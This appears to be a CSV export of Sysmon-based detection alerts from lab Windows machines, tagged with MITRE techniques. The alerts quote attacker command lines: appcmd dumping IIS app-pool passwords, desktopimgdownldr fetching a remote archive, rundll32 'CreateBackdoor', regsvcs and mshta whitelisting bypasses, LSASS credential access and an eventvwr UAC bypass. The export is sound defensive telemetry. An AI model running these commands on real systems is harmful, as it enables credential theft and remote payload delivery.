SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2
true
Microsoft Windows
Valid
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606693.389836,2019-04-18T20:58:13.389836+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"
7
3
4
7
0
0x8000000000000000
18
Microsoft-Windows-Sysmon/Operational
IEWIN7
technique_id=T1003,technique_name=Credential Dumping
2019-04-18 16:58:12.919
365ABB72-AC28-5CB8-0000-0010F3F70700
1200
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\cryptdll.dll
6.1.7600.16385 (win7_rtm.090713-1255)
Cryptography Manager
Microsoft® Windows® Operating System
Microsoft Corporation
SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2
true
Microsoft Windows
Valid
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.352255,2019-05-27T05:29:18.352255+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Description: Cannot read configuration file due to insufficient permissions" /text:processmodel.password ),1,"
1
5
4
1
0
0x8000000000000000
5922
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:18.322
365ABB72-3D6E-5CEB-0000-00104C92FF00
3100
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Description: Cannot read configuration file due to insufficient permissions" /text:processmodel.password
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1552853872.97915,2019-03-18T00:17:52.979150+04:00,,Threat,Low,Found User (PC04\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /C "C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat" ),1,"
1
5
4
1
0
0x8000000000000000
5260
Microsoft-Windows-Sysmon/Operational
PC04.example.corp
2019-03-17 20:17:52.899
365ABB72-AB70-5C8E-0000-0010781D0A00
3272
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\cmd.exe" /C "C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"
C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\
PC04\IEUser
365ABB72-A960-5C8E-0000-002004C00300
0x3c004
1
High
MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-A965-5C8E-0000-0010D9100400
3884
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1603490302.074619,2020-10-24T01:58:22.074619+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd)",1,"
1
5
4
1
0
0x8000000000000000
424261
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-23 21:58:22.062
747F3D96-51FE-5F93-0000-0010DC535E00
8920
C:\Windows\SysWOW64\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
"C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd
C:\PROGRA~3\
MSEDGEWIN10\IEUser
747F3D96-4690-5F93-0000-002019A60800
0x8a619
1
Medium
SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
747F3D96-51FD-5F93-0000-00103B425E00
7504
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490302.074619,2020-10-24T01:58:22.074619+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd ),1,"
1
5
4
1
0
0x8000000000000000
424261
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-23 21:58:22.062
747F3D96-51FE-5F93-0000-0010DC535E00
8920
C:\Windows\SysWOW64\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
"C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd
C:\PROGRA~3\
MSEDGEWIN10\IEUser
747F3D96-4690-5F93-0000-002019A60800
0x8a619
1
Medium
SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
747F3D96-51FD-5F93-0000-00103B425E00
7504
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1603490302.074619,2020-10-24T01:58:22.074619+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd ),1,"
1
5
4
1
0
0x8000000000000000
424261
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-23 21:58:22.062
747F3D96-51FE-5F93-0000-0010DC535E00
8920
C:\Windows\SysWOW64\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
"C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd
C:\PROGRA~3\
MSEDGEWIN10\IEUser
747F3D96-4690-5F93-0000-002019A60800
0x8a619
1
Medium
SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
747F3D96-51FD-5F93-0000-00103B425E00
7504
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.282154,2019-05-27T05:29:18.282154+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Description: Cannot read configuration file due to insufficient permissions" /text:processmodel.username ),1,"
1
5
4
1
0
0x8000000000000000
5919
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:18.232
365ABB72-3D6E-5CEB-0000-00108C8EFF00
3144
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Description: Cannot read configuration file due to insufficient permissions" /text:processmodel.username
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1593766040.077424,2020-07-03T12:47:20.077424+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ),1,"
1
5
4
1
0
0x8000000000000000
305352
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-07-03 08:47:20.001
747F3D96-F098-5EFE-0000-001012E13801
1932
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr
C:\Users\IEUser\
MSEDGEWIN10\IEUser
747F3D96-1CE4-5EFE-0000-0020CC9C0800
0x89ccc
1
Medium
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-EF3D-5EFE-0000-0010F3653401
5384
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1560582872.809734,2019-06-15T11:14:32.809734+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.13 ) to hostname ( ) , IP ( 10.0.2.18 ) and port ( 4443 )",3,"
3
5
4
3
0
0x8000000000000000
7649
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-06-15 07:13:42.577
365ABB72-9AA6-5D04-0000-00109C850F00
652
C:\Windows\System32\mshta.exe
IEWIN7\IEUser
tcp
true
false
10.0.2.13
IEWIN7
49159
false
10.0.2.18
4443
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1562186370.254733,2019-07-04T00:39:30.254733+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe)",1,"
1
5
4
1
0
0x8000000000000000
8352
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-07-03 20:39:30.254
365ABB72-1282-5D1D-0000-0010DD401B00
2328
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32.exe
C:\Users\IEUser\
IEWIN7\IEUser
365ABB72-0A6F-5D1D-0000-0020CA350100
0x135ca
1
Medium
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-1256-5D1D-0000-0010FB1A1B00
1632
C:\Windows\System32\notepad.exe
"C:\Windows\system32\notepad.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1562186370.254733,2019-07-04T00:39:30.254733+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe ),1,"
1
5
4
1
0
0x8000000000000000
8352
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-07-03 20:39:30.254
365ABB72-1282-5D1D-0000-0010DD401B00
2328
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32.exe
C:\Users\IEUser\
IEWIN7\IEUser
365ABB72-0A6F-5D1D-0000-0020CA350100
0x135ca
1
Medium
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-1256-5D1D-0000-0010FB1A1B00
1632
C:\Windows\System32\notepad.exe
"C:\Windows\system32\notepad.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1562186370.254733,2019-07-04T00:39:30.254733+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe ),1,"
1
5
4
1
0
0x8000000000000000
8352
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-07-03 20:39:30.254
365ABB72-1282-5D1D-0000-0010DD401B00
2328
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32.exe
C:\Users\IEUser\
IEWIN7\IEUser
365ABB72-0A6F-5D1D-0000-0020CA350100
0x135ca
1
Medium
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-1256-5D1D-0000-0010FB1A1B00
1632
C:\Windows\System32\notepad.exe
"C:\Windows\system32\notepad.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436009.341503,2019-07-30T01:33:29.341503+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll ),1,"
1
5
4
1
0
0x8000000000000000
4917
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:28.222
747F3D96-6628-5D3F-0000-001062788800
2040
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.202039,2019-05-27T05:29:18.202039+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password ),1,"
1
5
4
1
0
0x8000000000000000
5916
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:18.161
365ABB72-3D6E-5CEB-0000-0010CC8AFF00
2524
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.224263,2020-03-21T09:00:25.224263+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
1
5
4
1
0
0x8000000000000000
243540
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.029
747F3D96-9F69-5E75-0000-0010946B2000
1828
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 104.20.208.21 ) and port ( 80 )",3,"
3
5
4
3
0
0x8000000000000000
16794
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 18:35:04.463
365ABB72-6759-5CD8-0000-0010E2D50F00
1420
C:\Windows\System32\regsvr32.exe
IEWIN7\IEUser
tcp
true
false
10.0.2.15
IEWIN7..home
49165
false
104.20.208.21
80
http
",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.224263,2020-03-21T09:00:25.224263+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243540
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.029
747F3D96-9F69-5E75-0000-0010946B2000
1828
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1218.005 ] Mshta found running in the system,1560582824.106609,2019-06-15T11:13:44.106609+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta") and Parent Image :C:\Program Files\Internet Explorer\iexplore.exe , Parent CommandLine ("C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html) in directory : ( C:\Users\IEUser\Desktop\ )",1,"
1
5
4
1
0
0x8000000000000000
7648
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-06-15 07:13:42.278
365ABB72-9AA6-5D04-0000-00109C850F00
652
C:\Windows\System32\mshta.exe
11.00.9600.16428 (winblue_gdr.131013-1700)
Microsoft (R) HTML Application host
Internet Explorer
Microsoft Corporation
"C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta"
C:\Users\IEUser\Desktop\
IEWIN7\IEUser
365ABB72-98E4-5D04-0000-0020A4350100
0x135a4
1
High
SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A
365ABB72-9972-5D04-0000-0010F0490C00
3660
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\cmd.exe ) through command line ( cmd /c ping 127.0.0.1&&del del /F /Q /A:H "C:\Users\IEUser\AppData\Roaming\wwlib.dll" ),1,"
1
5
4
1
0
0x8000000000000000
417085
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-17 11:43:49.217
747F3D96-D8F5-5F8A-0000-00106B6F7300
1680
C:\Windows\SysWOW64\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
cmd /c ping 127.0.0.1&&del del /F /Q /A:H "C:\Users\IEUser\AppData\Roaming\wwlib.dll"
C:\Users\IEUser\AppData\Roaming\
MSEDGEWIN10\IEUser
747F3D96-CA8D-5F8A-0000-0020D1090A00
0xa09d1
1
High
SHA1=E2EAD0993B917E1828A658ADA0B87E01D5B8424F,MD5=C43699F84A68608E7E57C43B7761BBB8,SHA256=2EDB180274A51C83DDF8414D99E90315A9047B18C51DFD070326214D4DA59651,IMPHASH=392B4D61B1D1DADC1F06444DF258188A
747F3D96-D8E5-5F8A-0000-0010E1BC7200
2920
C:\Users\IEUser\AppData\Roaming\WINWORD.exe
C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436008.374373,2019-07-30T01:33:28.374373+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll ),1,"
1
5
4
1
0
0x8000000000000000
4916
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:28.197
747F3D96-6628-5D3F-0000-001067768800
1296
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.224263,2020-03-21T09:00:25.224263+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243540
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.029
747F3D96-9F69-5E75-0000-0010946B2000
1828
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1560582824.106609,2019-06-15T11:13:44.106609+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta" ) contain suspicious command ( \mshta.exe),1,"
1
5
4
1
0
0x8000000000000000
7648
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-06-15 07:13:42.278
365ABB72-9AA6-5D04-0000-00109C850F00
652
C:\Windows\System32\mshta.exe
11.00.9600.16428 (winblue_gdr.131013-1700)
Microsoft (R) HTML Application host
Internet Explorer
Microsoft Corporation
"C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta"
C:\Users\IEUser\Desktop\
IEWIN7\IEUser
365ABB72-98E4-5D04-0000-0020A4350100
0x135a4
1
High
SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A
365ABB72-9972-5D04-0000-0010F0490C00
3660
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1088] Bypass User Account Control - Process,1555606626.954307,2019-04-18T20:57:06.954307+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\mmc.exe ) through command line ( "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" ),1,"
1
5
4
1
0
0x8000000000000000
15
Microsoft-Windows-Sysmon/Operational
IEWIN7
technique_id=T1088,technique_name=Bypass User Account Control
2019-04-18 16:57:04.500
365ABB72-AC60-5CB8-0000-001037BA0800
3900
C:\Windows\System32\mmc.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Microsoft Management Console
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc"
C:\Users\IEUser\
IEWIN7\IEUser
365ABB72-AB27-5CB8-0000-002021CA0000
0xca21
1
High
